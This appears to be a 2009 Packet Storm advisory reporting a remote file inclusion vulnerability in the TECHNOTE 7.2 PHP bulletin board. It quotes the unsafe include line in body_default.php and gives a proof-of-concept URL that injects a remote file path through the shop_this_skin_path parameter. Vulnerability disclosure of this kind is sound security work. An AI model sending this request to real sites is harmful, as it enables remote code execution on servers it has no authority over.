Technote 7.2 Remote File Inclusion

2009-02-03T00:00:00
ID PACKETSTORM:74598
Type packetstorm
Reporter make0day
Modified 2009-02-03T00:00:00

Description

                                        
                                            `TECHNOTE 7.2 (08.09.25) Remote File Inclusion Vulnerability  
bY make0day@gmail.com  
  
/*************************  
  
TECHNOTE (VERSION 7.2 (08.09.25))is bulletin board system of Korea.  
It is freely available for all platforms that supports PHP and MySQL.  
But I find Remote File Inclusion vulnerability.  
Here is the details:  
  
**************************/  
TEST ON VERSION TECHNOTE 7.2 (08.09.25)  
Download : http://www.technote.co.kr/  
/***************************  
Remote File Inclusion Vulnerability  
  
/body_default.php  
  
if($GOODS['gs_input']) include "$shop_this_skin_path/2_view_body/include/form_option.php";  
//File Include  
  
*************************/  
  
poc:  
  
http://[site]/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=[RFI]  
  
  
`